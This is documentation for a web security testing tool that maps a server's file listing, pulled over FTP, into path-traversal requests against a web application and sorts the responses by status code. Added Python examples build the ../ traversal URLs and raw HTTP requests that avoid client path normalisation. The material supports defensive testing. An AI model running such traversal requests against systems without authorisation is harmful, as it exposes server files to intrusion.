- What is Path Traverser?
- How does it work?
- Configuration (4 Steps)
- Other features
What is Path Traverser?
Path Traverser is a tool for security testing of web applications.
It simulates a real Path Traversal attack, but only with files that actually exist on the server, so you won't need to use generic wordlists or pick the files one by one...
It operates as a middleman between your web application and its host server, giving you the ability to test the actual files found on the host server against the application, each at its relevant path.
How does it work?
After you have provided the relevant details, Path Traverser connects to your host server over FTP and pulls the recursive file listing (ls -R). The listing can be found in the Path Traverser directory under the name: listofFiles.txt
Then, it manipulates the list taken from the file system so it fits the web application, by rewriting each path.
How? Let's say that your application can be found at: http://mysrvr:777/home
and the application files can be found in the file system under: /myapps/demoapp/client/version/lastversion
Each file in the file system receives its relevant path, relative to that home directory: files under /myapps/demoapp/client/version/1.1/ are requested as http://mysrvr:777/home/../1.1/ (one level up, then into 1.1), and files under /myapps/differentapp/files/ are requested as http://mysrvr:777/home/../../../../differentapp/files/ (four levels up to /myapps, then down again), etc.
The manipulated list can be found in the Path Traverser directory under the name: url_list.txt
After that, Path Traverser starts sending these requests one by one.
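The mapping just described, as an added worked example in Python (this is not Path Traverser's own code, whose source is not shown here). The ls -R listing, host, port and directories are constructed to match the walkthrough above. raw_request is added to make a point the page only implies: browsers and many HTTP client libraries (curl without --path-as-is, for example) resolve ../ segments before sending, so the traversal request has to leave the client with the path exactly as generated.

```python
"""Mapping file-system paths to traversal requests (added example; constructed data)."""
import posixpath
from typing import List, Optional
from urllib.parse import urlsplit

# Constructed values matching the walkthrough in the text (assumptions).
APP_URL = "http://mysrvr:777/home"
HOME_DIR = "/myapps/demoapp/client/version/lastversion"

# Constructed sample of the `ls -R` output that would be saved as listofFiles.txt.
SAMPLE_LS_R = """\
/myapps/demoapp/client/version:
1.1
lastversion

/myapps/demoapp/client/version/1.1:
actions.log
index.html

/myapps/demoapp/client/version/lastversion:
app.js
index.html

/myapps/differentapp/files:
config.xml
"""


def parse_ls_r(listing: str) -> List[str]:
    """Return absolute file paths from `ls -R` output.

    `ls -R` prints a 'dir:' header, then that directory's entries, then a
    blank line.  Sub-directories are listed both as an entry of their parent
    and under their own header, so entries that match a header are dropped.
    """
    lines = [raw.rstrip() for raw in listing.splitlines()]
    dirs = {line[:-1] for line in lines if line.endswith(":")}
    files, current = [], None
    for line in lines:
        if not line:
            continue
        if line.endswith(":"):
            current = line[:-1]
        elif current is not None:
            files.append(posixpath.join(current, line))
    return [f for f in files if f not in dirs]


def traversal_url(app_url: str, home_dir: str, target: str) -> str:
    """Request URL that reaches `target` by traversing from the directory
    the application URL serves (`home_dir`)."""
    rel = posixpath.relpath(target, start=home_dir)
    return app_url.rstrip("/") + "/" + rel


def build_url_list(app_url: str, home_dir: str, files: List[str],
                   mode: str = "traversal") -> List[str]:
    """Contents of url_list.txt.  mode 'traversal' = every file on the file
    system (the default); mode 'access' = only files below home_dir, i.e.
    the Access to Files option."""
    urls = []
    for f in files:
        rel = posixpath.relpath(f, start=home_dir)
        if mode == "access" and rel.split("/")[0] == "..":
            continue
        urls.append(app_url.rstrip("/") + "/" + rel)
    return urls


def raw_request(url: str, cookie: Optional[str] = None) -> bytes:
    """HTTP/1.1 request with the path exactly as generated.  Browsers and
    many client libraries (curl without --path-as-is) resolve `..` before
    sending, which would turn /home/../1.1/x into /1.1/x and defeat the test.
    `cookie` is the value given with the Authenticated option, if any."""
    parts = urlsplit(url)
    path = parts.path or "/"
    if parts.query:
        path += "?" + parts.query
    headers = ["Host: %s" % parts.netloc, "Connection: close"]
    if cookie:
        headers.append("Cookie: %s" % cookie)
    return ("GET %s HTTP/1.1\r\n%s\r\n\r\n" % (path, "\r\n".join(headers))).encode()


if __name__ == "__main__":
    for u in build_url_list(APP_URL, HOME_DIR, parse_ls_r(SAMPLE_LS_R)):
        print(u)
```

To actually send a line of url_list.txt, open a TCP socket to the netloc and write the bytes from raw_request; the status line of the reply is what the Results Tab is bucketed on.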
You can follow the progress via the progress bar or the log file, which can be found under the name: requestsLog.txt
If something goes wrong, go to the Log Tab and try to figure out what went wrong, or contact me at: firstname.lastname@example.org - I will gladly help!
Now it's time to view the results, which can be found in the Results Tab.
Each request that received one of the selected response codes from the server is displayed next to that code in the Results Tab,
e.g.: http://mysrvr:777/home/../1.1/actions.log
They can also be found in the file named after the relevant response code, e.g.: Res200.txt,
in one of two folders: the folder named after the host (e.g.: mysrvr_Results) or, if the request list was uploaded manually, the folder: _Results
Configuration - How to make it work in 4 simple steps?
It might look a little complicated, but it is actually pretty trivial... just follow these steps:
1. Application URL
Enter your application URL, as it should be reached through the browser, e.g.: https://myapp:777/home
2. Home Directory
Enter the application path in the file system, where it holds the files for the web application, e.g.: /myapps/demoapp/client/version/lastversion
3. HTTP Status Codes
For each request sent, if the response from the server carries a status code you have selected (multiple choice), the request is written to the relevant file and to the Results Tab.
e.g.: if you have selected the codes 200 OK and 403 Forbidden, and the response for the file http://mysrvr:777/home/../1.1/actions.log is one of the two, you will find it in the Results Tab as: http://mysrvr:777/home/../1.1/actions.log and in the file Res200.txt or Res403.txt under the Results folder. The default is set to: 200 OK only.
4. Get file from Host / Upload Manually
In order for Path Traverser to perform the attack and start sending the requests, it needs one of two sources:
I. The host credentials: host name, user and password - Path Traverser then connects to the server over FTP, runs the command (ls -R) and retrieves the listing.
If this option is selected, Path Traverser then manipulates the listing to make it suitable for the application, as explained in the How does it work? section.
The file with the ready list of requests can be found under: url_list.txt
II. The other option is to upload a ready list of requests using the Upload manually option; just browse to the relevant file.
That's it! Now you are good to go - press the Start button (of course, you can Pause or Stop at any time).
The Status Bar displays the current action being performed by Path Traverser, or any error message that needs the user's attention, so keep an eye on it...
Path Traversal / Access to Files
This feature lets you choose between a Path Traversal attack, which sends requests for files across the whole file system,
and Access to Files, which sends requests for the application's own files only. The default is set to Path Traversal.
Just click on the desired method:
You can also perform the attack with different roles / permissions.
All you have to do is check the Authenticated checkbox and provide the relevant cookie:
Sometimes, applications return a successful response (e.g. 200 OK) for unavailable pages as well, so in fact the request was not successful.
In that case, you can add the error message manually; if it appears in the response body, the request is not counted as a successful result.
Click on the Error Message checkbox and provide the error string (e.g. "Please contact your Administrator"):
File Type Configuration
If you want to test only specific file types (logs, source code files, xml, etc...) you can configure Path Traverser to use specific file types (choose the Use only the following File Types option) or to exclude them (choose the Exclude the following File Types option).
To do so, click on the Configure button next to the Manual option after you have selected it, or go to the Configuration Tab and click the Enable button.
There, you can select a family of files to test/exclude, or add your own by checking the Other checkbox and entering the file types, separated by commas (e.g.: xml, log, sql, sh). You can always go back to the defaults by clicking the Restore to Default button, or turn the filter off with the Disable button:
You are only the tester? You don't know where the application files are located in the server's file system?
You can provide a file or folder name that you know exists in the application (you came across it while testing...) and let Path Traverser suggest available locations. Click on the ? next to the Home Directory field, or check the file/folder in the host's file system in the Configuration Tab: choose File or Library, enter the name and click Find (important!! you must provide the host credentials). A list of locations where it was found in the environment will be displayed:
If you would like to use one of them, select it and press Use selected; it will be added to the Home Directory field.
If you need to edit it (e.g. go one folder back), go to the Main Tab and edit it in the Home Directory field.
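The three options described above (the Error Message filter, File Type Configuration, and the Home Directory suggestion), as an added example in Python. This is not Path Traverser's code; the file listing, the responses and the names are constructed, and the exact matching rules (substring match for the error string, extension match for file types) are assumptions about how the tool behaves.

```python
"""Result filtering and home-directory suggestion (added example; constructed data)."""
import posixpath
from typing import Dict, Iterable, List, Optional, Set, Tuple

# Constructed listing (absolute paths, as parsed from listofFiles.txt).
SAMPLE_FILES = [
    "/myapps/demoapp/client/version/1.1/actions.log",
    "/myapps/demoapp/client/version/1.1/index.html",
    "/myapps/demoapp/client/version/lastversion/app.js",
    "/myapps/demoapp/client/version/lastversion/index.html",
    "/myapps/differentapp/files/config.xml",
    "/var/lib/demoapp/backup/dump.sql",
]

# Constructed (url, status, body) tuples standing in for the responses the
# tool receives; the second one is a "soft 404" that still returns 200.
SAMPLE_RESPONSES = [
    ("http://mysrvr:777/home/../1.1/actions.log", 200, "2014-01-02 login ok\n"),
    ("http://mysrvr:777/home/../1.1/missing.txt", 200,
     "<html>Please contact your Administrator</html>"),
    ("http://mysrvr:777/home/../../../../differentapp/files/config.xml", 403, "Forbidden"),
    ("http://mysrvr:777/home/../1.1/index.html", 404, "Not found"),
]


def parse_types(spec: str) -> Set[str]:
    """Extensions from the Other box ("xml, log, sql, sh"): lower-case, no dot."""
    return {t.strip().lstrip(".").lower() for t in spec.split(",") if t.strip()}


def filter_by_type(paths: Iterable[str], spec: str, exclude: bool = False) -> List[str]:
    """'Use only the following File Types' (exclude=False) or
    'Exclude the following File Types' (exclude=True), applied to the
    listing before url_list.txt is built."""
    types = parse_types(spec)
    kept = []
    for p in paths:
        ext = posixpath.splitext(p)[1].lstrip(".").lower()
        if (ext in types) != exclude:
            kept.append(p)
    return kept


def is_hit(status: int, body: str, selected_codes: Set[int],
           error_string: Optional[str] = None) -> bool:
    """A request counts when its status code was selected and, if an Error
    Message string is configured, that string is absent from the body."""
    if status not in selected_codes:
        return False
    if error_string and error_string in body:
        return False
    return True


def bucket_results(responses: Iterable[Tuple[str, int, str]], selected_codes: Set[int],
                   error_string: Optional[str] = None) -> Dict[str, List[str]]:
    """Group hits by result file name (Res200.txt, Res403.txt, ...)."""
    out: Dict[str, List[str]] = {}
    for url, status, body in responses:
        if is_hit(status, body, selected_codes, error_string):
            out.setdefault("Res%d.txt" % status, []).append(url)
    return out


def suggest_home_dirs(files: Iterable[str], name: str, kind: str = "file") -> List[str]:
    """Directories that contain a file (kind='file') or a sub-directory
    (kind='library') called `name`: candidates for the Home Directory field."""
    hits = set()
    for f in files:
        parts = f.split("/")          # absolute path, so parts[0] == ""
        if kind == "file":
            if parts[-1] == name:
                hits.add(posixpath.dirname(f))
        else:
            for i in range(1, len(parts) - 1):
                if parts[i] == name:
                    hits.add("/".join(parts[:i]) or "/")
    return sorted(hits)


if __name__ == "__main__":
    print(bucket_results(SAMPLE_RESPONSES, {200, 403}, "Please contact your Administrator"))
    print(suggest_home_dirs(SAMPLE_FILES, "actions.log"))
```

Without the error string, the soft-404 page lands in Res200.txt alongside the real log file, which is exactly the false positive the Error Message option exists to remove.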
Save / Load State
If you don't want to fill in the details again each time, click on Save state to save the details entered.
These details can be found in the Path Traverser folder under the name: template.ptt
They can be loaded again by pressing the Load state button:
Skip to Line
If for any reason the test stopped, you don't have to start all over. Check Skip to line #, after you have uploaded the last request list you used or that was created (url_list.txt, as explained in the How does it work? section).
Then, enter the desired line number and press the Run button. The test will start from that line and run until the end of the file.